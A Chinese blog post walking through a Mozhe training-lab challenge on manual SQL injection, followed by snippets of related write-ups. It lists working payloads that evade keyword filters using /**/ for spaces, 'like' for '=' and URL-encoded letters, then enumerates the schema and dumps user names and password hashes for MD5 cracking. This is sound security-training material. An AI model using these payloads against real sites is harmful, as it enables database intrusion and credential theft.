墨者 - SQL过滤字符后手工注入漏洞测试(第2题)

最新推荐文章于 2022-10-03 23:16:05 发布
最新推荐文章于 2022-10-03 23:16:05 发布
阅读量679 收藏 1
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 墨者刷题笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_39936434/article/details/95467955
本文记录了一次SQL注入测试过程。起初用order by测试被拦截,后通过用/**/代替空格、like代替=绕过。测试字段时用union select被拦截,将关键字字母转编码后执行成功。随后按常规方法进行爆库、爆表、爆字段和爆字段值操作,最后可对获取的md5值在线解密。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一开始直接用order by 测试,被拦截

后来试着绕过,空格用/**/代替,=用like代替

可以绕过,成功执行

 测试到字段有4个,用union select 1,2,3,4

 发现被拦截无法执行,猜想是拦截了关键字,试着把关键字段得某个字母转编码

/**/and/**/1/**/like/**/2/**/%75nion/**/%73elect/**/1,2,3,4  执行成功

接下来就是老套路了

爆库,/**/and/**/1/**/like/**/2/**/%75nion/**/%73elect/**/1,database(),3,4

爆表,/**/and/**/1/**/like/**/2/**/%75nion/**/%73elect/**/1,(%73elect/**/table_name/**/%66rom/**/information_schema.tables/**/%77here/**/table_schema/**/like/**/%27mozhe_discuz_stormgroup%27%6cimit/**/2,1),3,4

爆字段,/**/and/**/1/**/like/**/2/**/%75nion/**/%73elect/**/1,(%73elect/**/group_concat(column_name)/**/%66rom/**/information_schema.columns/**/%77here/**/table_schema/**/like/**/%27mozhe_discuz_stormgroup%27and/**/table_name/**/like/**/%27stormgroup_member%27),3,4

爆字段值,/**/and/**/1/**/like/**/2/**/%75nion/**/%73elect/**/1,(%73elect/**/group_concat(name,password)/**/%66rom/**/stormgroup_member),3,4 

md5在线解密即可 

墨者靶场 初级:SQL过滤字符手工注入漏洞测试
qq_43233085的博客
01-13 549
墨者靶场 初级:SQL过滤字符手工注入漏洞测试目背景介绍实训目标解方向解步骤 目 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Apache+PHP+MySQL,PHP代码对客户端提交的参数做了些许过滤。来感受过滤过后的SQL手工注入吧。 实训目标 1、掌握SQL注入原理; 2、了解手工注入的方法; 3、了解字符串的URL加解密; 4、了解SQL注入...
墨者学院SQL过滤字符手工注入漏洞测试(第1)
痴人说梦梦中人
11-13 366
1、 我也没想到那么多弯弯绕绕的,看到评论区有提示,就照做了,编写url编码脚本,获取注入payload,测试回显位置。 #!/usr/bin/env python # -*- coding:UTF-8 -*- #time:2019/11/9 1:03 #author:White9527 from urllib import parse import re #查询语句 s1 = """ord...
墨者学院----SQL过滤字符手工注入漏洞测试(2)
qq_43590351的博客
01-26 516
SQL过滤字符手工注入漏洞测试(2) 按照基本流程我们在url中输入单引号报错,说明存在SQL注入。直接输入order by发现页面异常,可能被过滤 尝试利用like等于号和==/**/空格==进行绕过 ?id=1/**/order/**/by/**/4 页面正常说明字段数为4 接下来利用联合查询,看是否有回显点 ...
墨者学院SQL过滤字符手工注入漏洞测试(2)
没事我溜达
03-19 2296
过滤了空格、union、and、select等数据库查询关键字符
SQL过滤字符手工注入漏洞测试(2)——<墨者学院漏洞记录>
chick11的博客
07-16 260
http://219.153.49.228:40519/new_list.php?id=1 http://219.153.49.228:40519/new_list.php?id=1' http://219.153.49.228:40519/new_list.php?id=1'%23 http://219.153.49.228:40519/new_list.php?id=1' and 1=1 经过上面几轮测试,可以看出本:空格,单引号,等号,union,select,from都过滤。 因此进行替换:
SQL过滤字符手工注入漏洞测试(第1)
weixin_30240349的博客
04-23 171
https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe 分析目,属于时间盲注,这种情况,通常使用sqlmap 直接注入就行了,手动语法太复杂了!!! sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --ta...
墨者_SQL过滤字符手工注入漏洞测试(第3)
weixin_50698958的博客
10-12 475
靶场: https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe 背景介绍 安全工程师"墨者"最近在练习搭建一个采购系统,为了安全起见,“墨者”对该系统做了部分防护措施,请你帮助他测试系统是否安全。 实训目标 1、掌握SQL注入原理; 2、了解手工注入的方法; 3、了解MySQL的数据结构; 4、了解SQL注入常用注释字符; 5、了解sql注入常用绕过姿势; 解方向 手工进行SQL注入测试
墨者学院-SQL注入漏洞测试(布尔盲注)
weixin_42939822的博客
03-20 4488
决心按部就班、由浅入深地去剖析下sql注入目提供的靶场环境,完善自身解思路。本靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入目。废话不多说啦,先附上目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
墨者_SQL手工注入漏洞测试(Sybase数据库)
weixin_50698958的博客
10-23 870
靶场: https://www.mozhe.cn/bug/detail/b0R2Q0VJL3lnellUMjJoUmRsK1FsZz09bW96aGUmozhe 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Apache+PHP+Sybase,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Sybase的数据结构; 4.了解字符串的MD5加解密; 解方向 手工进行
墨者SQL过滤字符手工注入漏洞测试(2)
wswr的博客
03-14 1269
思路:这相比较前一提的难点就是,你它到底过滤了啥,虽然说这个是难点,但是同时也是最无所谓的难点,毕竟,我就算不知道具体过滤啥,我还是该试的都试试,记得上提是用url编码然后绕过,那延续过来这行不行呢,然后你会发现,好像确实可以,emm,那好像真就和第一没什么大区别就算啦。(PS:上的思路就是用URL编码绕过检测) 总结一下:和上没什么区别,上懂了这一样的操作马上解决 那么就快速过一遍了(列还是4,回显点是2,3) 老样子查数据库查版本 /**/union/**/select/**/1,
SQL过滤字符手工注入漏洞测试(2)
weixin_47493074的博客
10-03 277
SQL过滤字符手工注入漏洞测试(2)
墨者学院SQL过滤字符手工注入漏洞测试
没事我溜达
03-16 1317
靶场地址: SQL过滤字符手工注入漏洞测试(第1)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 关于CTFHUB中的sql注入以及文件上传知识点我们已经学习过一遍了,如果大家都掌握的话,那我们也算是过了入门这个关了。 今天来学习墨者学院中的字符过滤靶场 我们打开靶场 我们进到靶场看到一个登录页面 看到这我也是很激动呀,打开BP就是一顿爆破,结果没爆破出来.. 然后仔细看到下方有个导航条我我们点进去 注意看这个URL,我就怀疑注入点在这里,然后打开.
墨者靶场-SQL过滤字符手工注入漏洞测试(第1)
shy的博客
11-15 391
墨者学习 By/shy014 进去首页又看到熟悉的公告 通过简单的测试,确定存在sql注入漏洞,但是输入and 1=1 ,and 1=2,order by,union select ,and都没...
墨者学院SQL过滤字符手工注入漏洞测试(第3)
没事我溜达
03-20 3155
靶场地址:SQL过滤字符手工注入漏洞测试(第3)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 我们进入靶场(这次总算是不一样的了) 首先判断注入 我们在后面加入一个单引号,发现页面报错 能做到这个靶场的都不是新手,我就不说为什么报错了,我们在后面加上注释符,即可完成闭合,使得页面显示正常 然后order by判断列数,在第8列页面不回显,那么判断数据库有7列数据 判断回显位置 查询数据库名 http://1...
笔记:SQL过滤字符手工注入漏洞测试(第1)
m0_67399862的博客
05-26 603
一打开网页时,发现正常打and 1=1的语句都被过滤了 考虑空格被过滤 将空格用/**/表示转换为URL时,发现语句仍报错,考虑有可能是等号被过滤 将=用like表示转换为URL 相当于输入了and 1=1的语句,页面正常 相当于输入了and 1=2的语句,发现页面报错,说明有SQL注入 用order by语句查询字段数 说明字段数只有4个 发现语句没有拼接在一起 将id=1改为id=-1 接下来按常规的爆库,爆表,...
墨者学院----SQL过滤字符手工注入漏洞测试(第1)
qq_43590351的博客
01-22 581
SQL过滤字符手工注入漏洞测试(第1) 按照基本流程我们在url中输入单引号报错,说明存在SQL注入,但是在输入order by union select发现页面 保持正常,有可能我们输入的字符过滤 过滤的"="号可以利用like代替,空格用==/**/==代替 判断字段数 /**/order/**/by/**/4 介绍一个在线的url编码解码网站 http://web.chacuo.net/charseturlencode 由于被过滤所以我们要进行url的编码。%2f%2a%2a%2f%6f%7
墨者-SQL过滤字符手工注入漏洞测试(第1)
zr1213159840的博客
12-10 913
和以前的简单目一样,看目的提示以及自己的测试知道过滤了=,–+,空格符号。等于可以使用like进行替代,空格可以使用/**/进行替代。最主要的,感觉目给了误解,没有说准确,目说url加密,但是经过测试直接选在网上选择url加密的链接并不行,最后测试是url网址16进制加密才可以,链接如下 url16进制加密 下面开始正式步骤: 首先是测试是否存在注入,将id=1改成id=2,没得显示,可能存在漏洞。 然后我们再测试下id=1 and 1=1和and 1=2行不行,需要注意的是,需要对空格以及=进
墨者学院——SQL手工注入漏洞测试(MySQL数据库)
weixin_47118413的博客
06-21 2952
背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值